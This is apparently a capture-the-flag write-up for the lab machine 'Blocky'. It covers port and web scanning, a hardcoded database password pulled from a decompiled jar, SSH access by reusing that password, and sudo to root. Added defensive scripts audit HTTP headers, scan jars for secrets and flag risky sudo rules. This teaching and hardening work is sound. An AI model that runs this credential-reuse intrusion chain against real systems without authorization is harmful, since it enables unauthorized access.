Difficulty Rating:

Machine: Blocky
OS: Linux
IP: 10.10.10.37/38

  • Nmap
$ nmap -Pn -sV -T4 10.10.10.38

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-24 17:25 IST
Nmap scan report for 10.10.10.38
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds
  • Nikto
$ nikto -h http://10.10.10.38
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.38
+ Target Hostname:    10.10.10.38
+ Target Port:        80
+ Start Time:         2017-07-24 17:28:08 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ RFC-1918 IP address found in the 'link' header. The IP is "192.168.2.70".
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.2.70/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7667 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-07-24 17:56:22 (GMT5.5) (1694 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
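  • Most of the Nikto findings above are response-header hygiene: missing X-Frame-Options and X-Content-Type-Options, a test cookie without HttpOnly, an RFC-1918 address leaking through the Link header, and a version-bearing Server banner. The script below is an added example (not part of the original writeup or any tool shown here) that reproduces those checks over a raw HTTP response, so a defender can re-run them after hardening Apache and WordPress. The sample response is constructed to mirror the headers in the scan; the header checklist and the cookie-attribute rules are my own assumptions about a reasonable baseline.

```python
import ipaddress
import re

# Constructed sample: a raw HTTP response shaped like the one Nikto saw above.
# Header values mirror the scan output on this page; the body is omitted.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    'Link: <http://192.168.2.70/index.php/wp-json/>; rel="https://api.w.org/"\r\n'
    "x-ob_mode: 1\r\n"
    "Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)

# Assumed baseline of headers a hardened site should send (lower-cased names).
REQUIRED_HEADERS = {
    "x-frame-options": "anti-clickjacking header missing",
    "x-content-type-options": "MIME-sniffing protection missing",
    "content-security-policy": "no CSP; XSS impact is not constrained",
}

def parse_headers(raw):
    """Return (lower-cased name, value) pairs from a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:      # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers

def private_hosts_in_link(value):
    """Hosts inside <...> targets of a Link header that are private/loopback IPs."""
    found = []
    for url in re.findall(r"<([^>]+)>", value):
        host = re.sub(r"^[a-z]+://", "", url).split("/", 1)[0].split(":")[0]
        try:
            if ipaddress.ip_address(host).is_private:
                found.append(host)
        except ValueError:                   # a hostname, not an IP literal
            pass
    return found

def cookie_issues(value):
    """Flag a Set-Cookie value that lacks the usual protective attributes."""
    name = value.split("=", 1)[0].strip()
    attrs = {a.strip().split("=", 1)[0].lower() for a in value.split(";")[1:]}
    issues = []
    for attr, label in (("httponly", "HttpOnly"), ("secure", "Secure"), ("samesite", "SameSite")):
        if attr not in attrs:
            issues.append(f"cookie {name} lacks {label}")
    return issues

def audit(raw):
    """Run the Nikto-style header checks and return human-readable findings."""
    headers = parse_headers(raw)
    present = {n for n, _ in headers}
    findings = [msg for h, msg in REQUIRED_HEADERS.items() if h not in present]
    for name, value in headers:
        if name == "link":
            for host in private_hosts_in_link(value):
                findings.append(f"internal address {host} leaked in Link header")
        elif name == "set-cookie":
            findings.extend(cookie_issues(value))
        elif name == "server" and re.search(r"/\d", value):
            findings.append("Server header discloses version: " + value)
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE):
        print("[!]", finding)
```

  • The Link header leak is the WordPress siteurl/home setting still pointing at the internal 192.168.2.70 address; fixing the option in wp_options clears it, while the header and cookie items are Apache and PHP configuration.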

  • Dirb
$ dirb http://10.10.10.38

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul 24 18:39:22 2017
URL_BASE: http://10.10.10.38/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.38/ ----
+ http://10.10.10.38/index.php (CODE:301|SIZE:0)                                    
==> DIRECTORY: http://10.10.10.38/javascript/                                                     
==> DIRECTORY: http://10.10.10.38/phpmyadmin/                                                           
==> DIRECTORY: http://10.10.10.38/plugins/                                                         
+ http://10.10.10.38/server-status (CODE:403|SIZE:299)                                                          
==> DIRECTORY: http://10.10.10.38/wiki/                                                                                
==> DIRECTORY: http://10.10.10.38/wp-admin/                                                               
==> DIRECTORY: http://10.10.10.38/wp-content/                                                               
==> DIRECTORY: http://10.10.10.38/wp-includes/                                                             
+ http://10.10.10.38/xmlrpc.php (CODE:405|SIZE:42)
  • Browsing the /plugins directory turns up BlockyCore.jar, which looks interesting.
  • Download the jar and decompile it. This is what the decompiled class looks like:
package com.myfirstplugin;

public class BlockyCore {
  public String sqlHost = "localhost";
  public String sqlUser = "root";
  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

  public BlockyCore() {}

  public void onServerStart() {}

  public void onServerStop() {}

  public void onPlayerJoin()
  {
    sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
  }

  public void sendMessage(String username, String message) {}
}
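  • The root cause here is a credential compiled into a jar that was then left in a web-served directory. String literals survive compilation in the class file's constant pool, so a build or pre-deploy check can catch this without a decompiler. The scanner below is an added example (my own code, not from the box or any tool used in this writeup): it walks the constant pool of every .class in a jar, flags string literals that look random enough to be secrets and identifiers that smell like credentials. The entropy and length thresholds, the credential-name regex, and the sample jar (a constructed class file carrying only the constant pool, with the same constants as BlockyCore) are all assumptions.

```python
import io
import math
import re
import struct
import zipfile

# Assumed heuristic: identifiers that usually name a credential.
CRED_NAME = re.compile(r"pass(word|wd)?|secret|token|api_?key|private_?key", re.I)

def shannon_entropy(text):
    """Bits of entropy per character; random-looking secrets score high."""
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def parse_constant_pool(data):
    """Walk a .class file's constant pool; returns {index: (kind, payload)}."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    pos, idx, pool = 10, 1, {}
    two_byte_refs = {7: "Class", 8: "String", 16: "MethodType", 19: "Module", 20: "Package"}
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                                  # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack_from(">H", data, pos)
            pos += 2
            pool[idx] = ("Utf8", data[pos:pos + length].decode("utf-8", "replace"))
            pos += length
        elif tag in two_byte_refs:                    # a single u2 index into the pool
            (ref,) = struct.unpack_from(">H", data, pos)
            pos += 2
            pool[idx] = (two_byte_refs[tag], ref)
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):    # four-byte entries
            pool[idx] = ("Other", None)
            pos += 4
        elif tag in (5, 6):                           # Long/Double: 8 bytes, two slots
            pool[idx] = ("Wide", None)
            pos += 8
            idx += 1
        elif tag == 15:                               # MethodHandle: u1 kind + u2 index
            pool[idx] = ("Other", None)
            pos += 3
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        idx += 1
    return pool

def find_secrets(pool, min_len=12, min_entropy=3.5):
    """Flag random-looking string literals and credential-like identifiers."""
    findings = []
    # Only Utf8 entries referenced by CONSTANT_String are real string literals.
    literal_refs = {ref for kind, ref in pool.values() if kind == "String"}
    for ref in sorted(literal_refs):
        kind, text = pool[ref]
        if (kind == "Utf8" and len(text) >= min_len and " " not in text
                and shannon_entropy(text) >= min_entropy):
            findings.append(("high-entropy literal", text))
    for kind, text in pool.values():
        if kind == "Utf8" and "/" not in text and "(" not in text and CRED_NAME.search(text):
            findings.append(("credential-like identifier", text))
    return findings

def scan_jar(jar_bytes):
    """Return {class path: findings} for every .class inside an in-memory jar."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                hits = find_secrets(parse_constant_pool(jar.read(name)))
                if hits:
                    report[name] = hits
    return report

# --- constructed sample: a truncated class file carrying only the constant pool ---
def _utf8(s):
    b = s.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(b)) + b

def _ref(tag, index):
    return bytes([tag]) + struct.pack(">H", index)

def build_sample_jar():
    """Constructed stand-in for BlockyCore.jar: the same constants, no bytecode."""
    entries = [
        _utf8("sqlHost"), _utf8("localhost"), _ref(8, 2),                  # 1-3
        _utf8("sqlUser"), _utf8("root"), _ref(8, 5),                       # 4-6
        _utf8("sqlPass"), _utf8("8YsqfCTnvxAUeduzjNSXe22"), _ref(8, 8),    # 7-9
        _utf8("com/myfirstplugin/BlockyCore"), _ref(7, 10),                # 10-11
        _utf8("Welcome to the BlockyCraft!!!!!!!"), _ref(8, 12),           # 12-13
    ]
    class_bytes = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, len(entries) + 1) + b"".join(entries)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("com/myfirstplugin/BlockyCore.class", class_bytes)
    return buf.getvalue()

if __name__ == "__main__":
    for path, hits in scan_jar(build_sample_jar()).items():
        for kind, text in hits:
            print(f"{path}: {kind}: {text}")
```

  • Run against the sample it reports the 23-character password as a high-entropy literal and sqlPass as a credential-like field name, while "localhost" and "root" stay below the thresholds. On a real build the check belongs in CI, with the password moved to a config file or environment variable that is never copied into a web root.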
  • We now have a password for a MySQL database. We still need to find a username.

  • After running wpscan, we get:

$ sudo wpscan --url http://10.10.10.38 --enumerate u
[sudo] password for anton: 
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.10.10.38/
[+] Started: Mon Jul 24 20:04:47 2017

[!] The WordPress 'http://10.10.10.38/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.2.70/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.10.10.38/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.10.10.38/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.10.10.38/wp-includes/

[+] WordPress version 4.8 (Released on 2017-06-08) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v1.3

[+] Name: twentyseventeen - v1.3
 |  Latest version: 1.3 (up to date)
 |  Location: http://10.10.10.38/wp-content/themes/twentyseventeen/
 |  Readme: http://10.10.10.38/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://10.10.10.38/wp-content/themes/twentyseventeen/style.css
 |  Referenced style.css: http://192.168.2.70/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+---------+
    | Id | Login | Name    |
    +----+-------+---------+
    | 1  | notch | Notch – |
    +----+-------+---------+

[+] Finished: Mon Jul 24 20:05:05 2017
[+] Requests Done: 81
[+] Memory used: 17.602 MB
[+] Elapsed time: 00:00:17
  • We now have a username (notch) to go with the password from the jar. Let's ssh.

  • To get root

$ ssh notch@10.10.10.38
notch@10.10.10.38's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Mon Jul 24 10:49:53 2017 from 10.10.15.191
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ sudo -lU notch
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# ls /root
root.txt
root@Blocky:/home/notch# cat /root/root.txt
XXXXXXXXXXX
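  • Root here needed no exploit at all: the same password opened MySQL and the shell, and notch holds an unrestricted (ALL : ALL) ALL sudo rule plus membership in groups such as sudo and lxd that are effectively root on a default Ubuntu 16.04 host. The script below is an added example (my own audit helper, not from the box or any tool in this writeup) that parses `id` and `sudo -l` output of the shape shown above and lists what a reviewer of this account would flag. The sample inputs are constructed copies of the session output, and the list of root-equivalent groups is an assumption to be tuned per host.

```python
import re

# Constructed sample input, copied in shape from the session above.
ID_OUTPUT = ("uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),"
             "27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)")

SUDO_L_OUTPUT = r"""Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
"""

# Assumed list: groups whose membership is commonly equivalent to root access.
ROOT_EQUIVALENT_GROUPS = {
    "sudo": "default sudo group; policy in /etc/sudoers decides how much it grants",
    "wheel": "default sudo group on RHEL-style systems",
    "lxd": "can create containers with access to the host filesystem",
    "docker": "can create containers with access to the host filesystem",
    "disk": "raw read/write access to block devices",
    "adm": "reads system logs, which often contain secrets",
}

def parse_id(output):
    """Extract the user name and its group names from `id` output."""
    user = re.search(r"uid=\d+\(([^)]+)\)", output).group(1)
    groups_field = re.search(r"groups=(\S+)", output).group(1)
    groups = re.findall(r"\d+\(([^)]+)\)", groups_field)
    return user, groups

def parse_sudo_l(output):
    """Extract command specs from `sudo -l` output as a list of rule dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = re.match(r"\s*\(([^)]*)\)\s*(?:((?:NO)?PASSWD):\s*)?(.+)$", line)
        if m:
            runas, tag, cmds = m.groups()
            rules.append({"runas": runas.strip(), "nopasswd": tag == "NOPASSWD",
                          "commands": [c.strip() for c in cmds.split(",")]})
    return rules

def audit_account(id_output, sudo_output):
    """Return the findings a reviewer would raise for this account."""
    user, groups = parse_id(id_output)
    findings = []
    for g in groups:
        if g in ROOT_EQUIVALENT_GROUPS:
            findings.append(f"{user} is in group {g}: {ROOT_EQUIVALENT_GROUPS[g]}")
    for rule in parse_sudo_l(sudo_output):
        if "ALL" in rule["commands"]:
            findings.append(f"{user} may run ALL commands via sudo as ({rule['runas']})")
        if rule["nopasswd"]:
            findings.append(f"{user} has NOPASSWD sudo for {', '.join(rule['commands'])}")
    return findings

if __name__ == "__main__":
    for finding in audit_account(ID_OUTPUT, SUDO_L_OUTPUT):
        print("[!]", finding)
```

  • The fix is the usual pair: a sudoers rule scoped to the specific commands notch actually needs, and a distinct password for the MySQL root account so that a leaked database credential does not also become a shell credential.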
User and Root owned!!

Share the fun!